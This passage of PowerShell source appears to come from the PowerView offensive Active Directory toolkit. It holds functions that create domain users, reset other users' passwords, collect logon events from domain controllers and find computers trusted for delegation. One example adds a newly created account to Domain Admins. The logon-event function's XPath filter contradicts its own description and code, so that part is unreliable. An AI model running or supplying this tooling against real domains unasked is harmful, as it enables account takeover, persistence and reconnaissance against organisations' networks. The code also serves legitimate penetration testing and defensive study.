+.SYNOPSIS + +Creates a new domain user (assuming appropriate permissions) and returns the user object. + +TODO: implement all properties that New-ADUser implements (https://technet.microsoft.com/en-us/library/ee617253.aspx). + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +.DESCRIPTION + +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to create a new +DirectoryServices.AccountManagement.UserPrincipal with the specified user properties. + +.PARAMETER SamAccountName + +Specifies the Security Account Manager (SAM) account name of the user to create. +Maximum of 256 characters. Mandatory. + +.PARAMETER AccountPassword + +Specifies the password for the created user. Mandatory. + +.PARAMETER Name + +Specifies the name of the user to create. If not provided, defaults to SamAccountName. + +.PARAMETER DisplayName + +Specifies the display name of the user to create. If not provided, defaults to SamAccountName. + +.PARAMETER Description + +Specifies the description of the user to create. + +.PARAMETER Domain + +Specifies the domain to use to search for user/group principals, defaults to the current domain. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword + +Creates the 'harmj0y2' user with the specified description and password. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force +$user = New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword -Credential $Cred + +Creates the 'harmj0y2' user with the specified description and password, using the specified +alternate credentials. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred + +Creates the 'andy' user with the specified description and password, using the specified +alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember +and the alternate credentials. + +.OUTPUTS + +DirectoryServices.AccountManagement.UserPrincipal + +.LINK + +http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('DirectoryServices.AccountManagement.UserPrincipal')] + Param( + [Parameter(Mandatory = $True)] + [ValidateLength(0, 256)] + [String] + $SamAccountName, + + [Parameter(Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [Alias('Password')] + [Security.SecureString] + $AccountPassword, + + [ValidateNotNullOrEmpty()] + [String] + $Name, + + [ValidateNotNullOrEmpty()] + [String] + $DisplayName, + + [ValidateNotNullOrEmpty()] + [String] + $Description, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + $ContextArguments = @{ + 'Identity' = $SamAccountName + } + if 
($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain } + if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential } + $Context = Get-PrincipalContext @ContextArguments + + if ($Context) { + $User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context.Context) + + # set all the appropriate user parameters + $User.SamAccountName = $Context.Identity + $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword) + $User.SetPassword($TempCred.GetNetworkCredential().Password) + $User.Enabled = $True + $User.PasswordNotRequired = $False + + if ($PSBoundParameters['Name']) { + $User.Name = $Name + } + else { + $User.Name = $Context.Identity + } + if ($PSBoundParameters['DisplayName']) { + $User.DisplayName = $DisplayName + } + else { + $User.DisplayName = $Context.Identity + } + + if ($PSBoundParameters['Description']) { + $User.Description = $Description + } + + Write-Verbose "[New-DomainUser] Attempting to create user '$SamAccountName'" + try { + $Null = $User.Save() + Write-Verbose "[New-DomainUser] User '$SamAccountName' successfully created" + $User + } + catch { + Write-Warning "[New-DomainUser] Error creating user '$SamAccountName' : $_" + } + } +} + + +function Set-DomainUserPassword { +<# +.SYNOPSIS + +Sets the password for a given user identity. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +.DESCRIPTION + +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to search for the specified user -Identity, +which returns a DirectoryServices.AccountManagement.UserPrincipal object. The +SetPassword() function is then invoked on the user, setting the password to -AccountPassword. + +.PARAMETER Identity + +A user SamAccountName (e.g. User1), DistinguishedName (e.g. CN=user1,CN=Users,DC=testlab,DC=local), +SID (e.g. 
S-1-5-21-890171859-3433809279-3366196753-1113), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +specifying the user to reset the password for. + +.PARAMETER AccountPassword + +Specifies the password to reset the target user's to. Mandatory. + +.PARAMETER Domain + +Specifies the domain to use to search for the user identity, defaults to the current domain. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword + +Resets the password for 'andy' to the password specified. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword -Credential $Cred + +Resets the password for 'andy' usering the alternate credentials specified. 
+ +.OUTPUTS + +DirectoryServices.AccountManagement.UserPrincipal + +.LINK + +http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('DirectoryServices.AccountManagement.UserPrincipal')] + Param( + [Parameter(Position = 0, Mandatory = $True)] + [Alias('UserName', 'UserIdentity', 'User')] + [String] + $Identity, + + [Parameter(Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [Alias('Password')] + [Security.SecureString] + $AccountPassword, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + $ContextArguments = @{ 'Identity' = $Identity } + if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain } + if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential } + $Context = Get-PrincipalContext @ContextArguments + + if ($Context) { + $User = [System.DirectoryServices.AccountManagement.UserPrincipal]::FindByIdentity($Context.Context, $Identity) + + if ($User) { + Write-Verbose "[Set-DomainUserPassword] Attempting to set the password for user '$Identity'" + try { + $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword) + $User.SetPassword($TempCred.GetNetworkCredential().Password) + + $Null = $User.Save() + Write-Verbose "[Set-DomainUserPassword] Password for user '$Identity' successfully reset" + } + catch { + Write-Warning "[Set-DomainUserPassword] Error setting password for user '$Identity' : $_" + } + } + else { + Write-Warning "[Set-DomainUserPassword] Unable to find user '$Identity'" + } + } +} + + +function Get-DomainUserEvent { +<# +.SYNOPSIS + +Enumerate account logon events (ID 4624) and 
Logon with explicit credential +events (ID 4648) from the specified host (default of the localhost). + +Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +This function uses an XML path filter passed to Get-WinEvent to retrieve +security events with IDs of 4624 (logon events) or 4648 (explicit credential +logon events) from -StartTime (default of now-1 day) to -EndTime (default of now). +A maximum of -MaxEvents (default of 5000) are returned. + +.PARAMETER ComputerName + +Specifies the computer name to retrieve events from, default of localhost. + +.PARAMETER StartTime + +The [DateTime] object representing the start of when to collect events. +Default of [DateTime]::Now.AddDays(-1). + +.PARAMETER EndTime + +The [DateTime] object representing the end of when to collect events. +Default of [DateTime]::Now. + +.PARAMETER MaxEvents + +The maximum number of events to retrieve. Default of 5000. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target computer. + +.EXAMPLE + +Get-DomainUserEvent + +Return logon events on the local machine. + +.EXAMPLE + +Get-DomainController | Get-DomainUserEvent -StartTime ([DateTime]::Now.AddDays(-3)) + +Return all logon events from the last 3 days from every domain controller in the current domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainUserEvent -ComputerName PRIMARY.testlab.local -Credential $Cred -MaxEvents 1000 + +Return a max of 1000 logon events from the specified machine using the specified alternate credentials. 
+ +.OUTPUTS + +PowerView.LogonEvent + +PowerView.ExplicitCredentialLogonEvent + +.LINK + +http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.LogonEvent')] + [OutputType('PowerView.ExplicitCredentialLogonEvent')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('dnshostname', 'HostName', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = $Env:COMPUTERNAME, + + [ValidateNotNullOrEmpty()] + [DateTime] + $StartTime = [DateTime]::Now.AddDays(-1), + + [ValidateNotNullOrEmpty()] + [DateTime] + $EndTime = [DateTime]::Now, + + [ValidateRange(1, 1000000)] + [Int] + $MaxEvents = 5000, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + # the XML filter we're passing to Get-WinEvent + $XPathFilter = @" + + + + + + + + + + + *[ + System[ + Provider[ + @Name='Microsoft-Windows-Security-Auditing' + ] + and + (Level=4 or Level=0) and (EventID=4624 or EventID=4625 or EventID=4634) + ] + ] + and + *[ + EventData[ + ( + (Data[@Name='LogonType']='5' or Data[@Name='LogonType']='0') + or + Data[@Name='TargetUserName']='ANONYMOUS LOGON' + or + Data[@Name='TargetUserSID']='S-1-5-18' + ) + ] + ] + + + +"@ + $EventArguments = @{ + 'FilterXPath' = $XPathFilter + 'LogName' = 'Security' + 'MaxEvents' = $MaxEvents + } + if ($PSBoundParameters['Credential']) { $EventArguments['Credential'] = $Credential } + } + + PROCESS { + ForEach ($Computer in $ComputerName) { + + $EventArguments['ComputerName'] = $Computer + + Get-WinEvent @EventArguments| ForEach-Object { + $Event = $_ + $Properties = $Event.Properties + Switch ($Event.Id) { + # logon event + 4624 { + # skip computer logons, for now... 
+ if(-not $Properties[5].Value.EndsWith('$')) { + $Output = New-Object PSObject -Property @{ + ComputerName = $Computer + TimeCreated = $Event.TimeCreated + EventId = $Event.Id + SubjectUserSid = $Properties[0].Value.ToString() + SubjectUserName = $Properties[1].Value + SubjectDomainName = $Properties[2].Value + SubjectLogonId = $Properties[3].Value + TargetUserSid = $Properties[4].Value.ToString() + TargetUserName = $Properties[5].Value + TargetDomainName = $Properties[6].Value + TargetLogonId = $Properties[7].Value + LogonType = $Properties[8].Value + LogonProcessName = $Properties[9].Value + AuthenticationPackageName = $Properties[10].Value + WorkstationName = $Properties[11].Value + LogonGuid = $Properties[12].Value + TransmittedServices = $Properties[13].Value + LmPackageName = $Properties[14].Value + KeyLength = $Properties[15].Value + ProcessId = $Properties[16].Value + ProcessName = $Properties[17].Value + IpAddress = $Properties[18].Value + IpPort = $Properties[19].Value + ImpersonationLevel = $Properties[20].Value + RestrictedAdminMode = $Properties[21].Value + TargetOutboundUserName = $Properties[22].Value + TargetOutboundDomainName = $Properties[23].Value + VirtualAccount = $Properties[24].Value + TargetLinkedLogonId = $Properties[25].Value + ElevatedToken = $Properties[26].Value + } + $Output.PSObject.TypeNames.Insert(0, 'PowerView.LogonEvent') + $Output + } + } + + # logon with explicit credential + 4648 { + # skip computer logons, for now... 
+ if((-not $Properties[5].Value.EndsWith('$')) -and ($Properties[11].Value -match 'taskhost\.exe')) { + $Output = New-Object PSObject -Property @{ + ComputerName = $Computer + TimeCreated = $Event.TimeCreated + EventId = $Event.Id + SubjectUserSid = $Properties[0].Value.ToString() + SubjectUserName = $Properties[1].Value + SubjectDomainName = $Properties[2].Value + SubjectLogonId = $Properties[3].Value + LogonGuid = $Properties[4].Value.ToString() + TargetUserName = $Properties[5].Value + TargetDomainName = $Properties[6].Value + TargetLogonGuid = $Properties[7].Value + TargetServerName = $Properties[8].Value + TargetInfo = $Properties[9].Value + ProcessId = $Properties[10].Value + ProcessName = $Properties[11].Value + IpAddress = $Properties[12].Value + IpPort = $Properties[13].Value + } + $Output.PSObject.TypeNames.Insert(0, 'PowerView.ExplicitCredentialLogonEvent') + $Output + } + } + default { + Write-Warning "No handler exists for event ID: $($Event.Id)" + } + } + } + } + } +} + + +function Get-DomainGUIDMap { +<# +.SYNOPSIS + +Helper to build a hash table of [GUID] -> resolved names for the current or specified Domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-Forest + +.DESCRIPTION + +Searches the forest schema location (CN=Schema,CN=Configuration,DC=testlab,DC=local) for +all objects with schemaIDGUID set and translates the GUIDs discovered to human-readable names. +Then searches the extended rights location (CN=Extended-Rights,CN=Configuration,DC=testlab,DC=local) +for objects where objectClass=controlAccessRight, translating the GUIDs again. + +Heavily adapted from http://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. 
+ +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.OUTPUTS + +Hashtable + +Ouputs a hashtable containing a GUID -> Readable Name mapping. + +.LINK + +http://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([Hashtable])] + [CmdletBinding()] + Param ( + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + $GUIDs = @{'00000000-0000-0000-0000-000000000000' = 'All'} + + $ForestArguments = @{} + if ($PSBoundParameters['Credential']) { $ForestArguments['Credential'] = $Credential } + + try { + $SchemaPath = (Get-Forest @ForestArguments).schema.name + } + catch { + throw '[Get-DomainGUIDMap] Error in retrieving forest schema path from Get-Forest' + } + if (-not $SchemaPath) { + throw '[Get-DomainGUIDMap] Error in retrieving forest schema path from Get-Forest' + } + + $SearcherArguments = @{ + 'SearchBase' = $SchemaPath + 'LDAPFilter' = '(schemaIDGUID=*)' + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if 
($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $SchemaSearcher = Get-DomainSearcher @SearcherArguments + + if ($SchemaSearcher) { + try { + $Results = $SchemaSearcher.FindAll() + $Results | Where-Object {$_} | ForEach-Object { + $GUIDs[(New-Object Guid (,$_.properties.schemaidguid[0])).Guid] = $_.properties.name[0] + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainGUIDMap] Error disposing of the Results object: $_" + } + } + $SchemaSearcher.dispose() + } + catch { + Write-Verbose "[Get-DomainGUIDMap] Error in building GUID map: $_" + } + } + + $SearcherArguments['SearchBase'] = $SchemaPath.replace('Schema','Extended-Rights') + $SearcherArguments['LDAPFilter'] = '(objectClass=controlAccessRight)' + $RightsSearcher = Get-DomainSearcher @SearcherArguments + + if ($RightsSearcher) { + try { + $Results = $RightsSearcher.FindAll() + $Results | Where-Object {$_} | ForEach-Object { + $GUIDs[$_.properties.rightsguid[0].toString()] = $_.properties.name[0] + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainGUIDMap] Error disposing of the Results object: $_" + } + } + $RightsSearcher.dispose() + } + catch { + Write-Verbose "[Get-DomainGUIDMap] Error in building GUID map: $_" + } + } + + $GUIDs +} + + +function Get-DomainComputer { +<# +.SYNOPSIS + +Return all computers or specific computer objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +.DESCRIPTION + +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. To only return specific properties, use +"-Properties samaccountname,usnchanged,...". 
By default, all computer objects for +the current domain are returned. + +.PARAMETER Identity + +A SamAccountName (e.g. WINDOWS10$), DistinguishedName (e.g. CN=WINDOWS10,CN=Computers,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. 4f16b6bc-7010-4cbf-b628-f3cfe20f6994), +or a dns host name (e.g. windows10.testlab.local). Wildcards accepted. + +.PARAMETER UACFilter + +Dynamic parameter that accepts one or more values from $UACEnum, including +"NOT_X" negation forms. To see all possible values, run '0|ConvertFrom-UACValue -ShowAll'. + +.PARAMETER Unconstrained + +Switch. Return computer objects that have unconstrained delegation. + +.PARAMETER TrustedToAuth + +Switch. Return computer objects that are trusted to authenticate for other principals. + +.PARAMETER Printers + +Switch. Return only printers. + +.PARAMETER SPN + +Return computers with a specific service principal name, wildcards accepted. + +.PARAMETER OperatingSystem + +Return computers with a specific operating system, wildcards accepted. + +.PARAMETER ServicePack + +Return computers with a specific service pack, wildcards accepted. + +.PARAMETER SiteName + +Return computers in the specific AD Site name, wildcards accepted. + +.PARAMETER Ping + +Switch. Ping each host to ensure it's up before enumerating. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). 
+ +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER FindOne + +Only return one result object. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Raw + +Switch. Return raw results instead of translating the fields into a custom PSObject. + +.EXAMPLE + +Get-DomainComputer + +Returns the current computers in current domain. + +.EXAMPLE + +Get-DomainComputer -SPN mssql* -Domain testlab.local + +Returns all MS SQL servers in the testlab.local domain. + +.EXAMPLE + +Get-DomainComputer -UACFilter TRUSTED_FOR_DELEGATION,SERVER_TRUST_ACCOUNT -Properties dnshostname + +Return the dns hostnames of servers trusted for delegation. + +.EXAMPLE + +Get-DomainComputer -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -Unconstrained + +Search the specified OU for computeres that allow unconstrained delegation. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainComputer -Credential $Cred + +.OUTPUTS + +PowerView.Computer + +Custom PSObject with translated computer property fields. + +PowerView.Computer.Raw + +The raw DirectoryServices.SearchResult object, if -Raw is enabled. 
+#> + + [OutputType('PowerView.Computer')] + [OutputType('PowerView.Computer.Raw')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('SamAccountName', 'Name', 'DNSHostName')] + [String[]] + $Identity, + + [Switch] + $Unconstrained, + + [Switch] + $TrustedToAuth, + + [Switch] + $Printers, + + [ValidateNotNullOrEmpty()] + [Alias('ServicePrincipalName')] + [String] + $SPN, + + [ValidateNotNullOrEmpty()] + [String] + $OperatingSystem, + + [ValidateNotNullOrEmpty()] + [String] + $ServicePack, + + [ValidateNotNullOrEmpty()] + [String] + $SiteName, + + [Switch] + $Ping, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + DynamicParam { + $UACValueNames = [Enum]::GetNames($UACEnum) + # add in the negations + $UACValueNames = $UACValueNames | ForEach-Object {$_; "NOT_$_"} + # create new dynamic parameter + New-DynamicParameter -Name UACFilter -ValidateSet $UACValueNames -Type ([array]) + } + + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { 
$SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $CompSearcher = Get-DomainSearcher @SearcherArguments + } + + PROCESS { + #bind dynamic parameter to a friendly variable + if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) { + New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters + } + + if ($CompSearcher) { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match '^S-1-') { + $IdentityFilter += "(objectsid=$IdentityInstance)" + } + elseif ($IdentityInstance -match '^CN=') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' 
+ Write-Verbose "[Get-DomainComputer] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $CompSearcher = Get-DomainSearcher @SearcherArguments + if (-not $CompSearcher) { + Write-Warning "[Get-DomainComputer] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + elseif ($IdentityInstance.Contains('.')) { + $IdentityFilter += "(|(name=$IdentityInstance)(dnshostname=$IdentityInstance))" + } + elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { + $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + else { + $IdentityFilter += "(name=$IdentityInstance)" + } + } + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['Unconstrained']) { + Write-Verbose '[Get-DomainComputer] Searching for computers with for unconstrained delegation' + $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=524288)' + } + if ($PSBoundParameters['TrustedToAuth']) { + Write-Verbose '[Get-DomainComputer] Searching for computers that are trusted to authenticate for other principals' + $Filter += '(msds-allowedtodelegateto=*)' + } + if ($PSBoundParameters['Printers']) { + Write-Verbose '[Get-DomainComputer] Searching for printers' + $Filter += '(objectCategory=printQueue)' + } + if ($PSBoundParameters['SPN']) { + Write-Verbose "[Get-DomainComputer] Searching for computers with SPN: $SPN" + $Filter += "(servicePrincipalName=$SPN)" + } + if ($PSBoundParameters['OperatingSystem']) { + Write-Verbose "[Get-DomainComputer] Searching for computers with operating system: $OperatingSystem" + $Filter += "(operatingsystem=$OperatingSystem)" + } + if ($PSBoundParameters['ServicePack']) { + Write-Verbose "[Get-DomainComputer] Searching for computers with service pack: $ServicePack" + $Filter += 
"(operatingsystemservicepack=$ServicePack)" + } + if ($PSBoundParameters['SiteName']) { + Write-Verbose "[Get-DomainComputer] Searching for computers with site name: $SiteName" + $Filter += "(serverreferencebl=$SiteName)" + } + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainComputer] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + # build the LDAP filter for the dynamic UAC filter value + $UACFilter | Where-Object {$_} | ForEach-Object { + if ($_ -match 'NOT_.*') { + $UACField = $_.Substring(4) + $UACValue = [Int]($UACEnum::$UACField) + $Filter += "(!(userAccountControl:1.2.840.113556.1.4.803:=$UACValue))" + } + else { + $UACValue = [Int]($UACEnum::$_) + $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=$UACValue)" + } + } + + $CompSearcher.filter = "(&(samAccountType=805306369)$Filter)" + Write-Verbose "[Get-DomainComputer] Get-DomainComputer filter string: $($CompSearcher.filter)" + + if ($PSBoundParameters['FindOne']) { $Results = $CompSearcher.FindOne() } + else { $Results = $CompSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + $Up = $True + if ($PSBoundParameters['Ping']) { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $_.properties.dnshostname + } + if ($Up) { + if ($PSBoundParameters['Raw']) { + # return raw result objects + $Computer = $_ + $Computer.PSObject.TypeNames.Insert(0, 'PowerView.Computer.Raw') + } + else { + $Computer = Convert-LDAPProperty -Properties $_.Properties + $Computer.PSObject.TypeNames.Insert(0, 'PowerView.Computer') + } + $Computer + } + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainComputer] Error disposing of the Results object: $_" + } + } + $CompSearcher.dispose() + } + } +} + + +function Get-DomainObject { +<# +.SYNOPSIS + +Return all (or specified) domain objects in AD. 
+ +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-ADName + +.DESCRIPTION + +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. To only return specific properties, use +"-Properties samaccountname,usnchanged,...". By default, all objects for +the current domain are returned. + +.PARAMETER Identity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +.PARAMETER UACFilter + +Dynamic parameter that accepts one or more values from $UACEnum, including +"NOT_X" negation forms. To see all possible values, run '0|ConvertFrom-UACValue -ShowAll'. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. 